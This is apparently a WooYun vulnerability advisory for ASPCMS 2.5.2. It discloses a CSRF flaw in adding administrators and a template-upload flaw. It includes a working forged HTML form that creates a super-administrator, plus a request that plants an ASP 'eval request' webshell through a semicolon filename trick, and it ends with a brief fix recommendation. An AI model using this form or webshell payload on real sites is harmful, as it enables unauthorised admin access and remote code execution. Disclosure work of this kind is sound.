当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-060508

漏洞标题:ASPCMS最新版CSRF添加管理员及GetShell

相关厂商:ASPCMS

漏洞作者: 路人甲

提交时间:2014-05-13 11:10

修复时间:2014-08-11 11:12

公开时间:2014-08-11 11:12

漏洞类型:CSRF

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-08-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

~~

详细说明:

ASPCMS最新版2.5.2
CSRF添加管理员:
后台添加管理员的请求如下:
链接:http://10.65.203.100:90/admin_aspcms/_user/_Admin/AspCms_AdminAdd.asp?action=add
POST:GroupID=1&LoginName=111111&Password=111111&AdminDesc=111111&UserStatus=1
可以看到没有防御CSRF
我们构造伪造表单:

<FORM name="form" action="http://10.65.203.100:90/admin_aspcms/_user/_Admin/AspCms_AdminAdd.asp?action=add" method="post" >
<TD align=middle width=100 height=30>管理员组</TD>
<select name="GroupID" id="GroupID">
<option value="1" >超级管理员组</option>
<option value="6" >lpyuan</option>
<option value="5" >普通管理员</option>
</select>
<TD align=middle width=100 height=30>管理员名称</TD>
<INPUT class="input" style="FONT-SIZE: 12px; WIDTH: 300px" maxLength="200" name="LoginName"/>
<TD align=middle width=100 height=30>管理员密码</TD>
<INPUT type="Password" class="input" style="FONT-SIZE: 12px; WIDTH: 300px" maxLength="200" name="Password"/>
<TD align=middle width=100 height=30>管理员描述</TD>
<INPUT class="input" style="FONT-SIZE: 12px; WIDTH: 300px" maxLength="200" name="AdminDesc"/>
<TD align=middle width=100 height=30>状态</TD>
<INPUT class="checkbox" type="checkbox" name="UserStatus" checked="checked" value="1"/>
<INPUT class="button" type="submit" value="添加" />
</FORM>


漏洞利用之前:

1.png


2.png


CSRF添加管理员的过程:

3.png


未作任何验证,成功添加管理员,来看看添加结果:

4.png


CSRF直接GetShell:
后台编辑模板时,发送请求如下,我们可以添加模板的filename和filetext:
http://10.65.203.100:90/admin_aspcms/_style/AspCms_TemplateAdd.asp?acttype=html&action=add
filename=111111.asp;111111.html&filetext=%3C%25eval%20request%28%5C%27wooyun%5C%27%29%25%3E
再此过程中也没有做任何验证,而且对添加模板的文件名也没有严格处理,导致CSRF直接获取webshell:

5.png


shell地址为:
http://10.65.203.100:90//Templates/cn2014/html/111111.asp;111111.html

漏洞证明:

将详细说明

修复方案:

添加CSRF验证,严格处理文件名

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论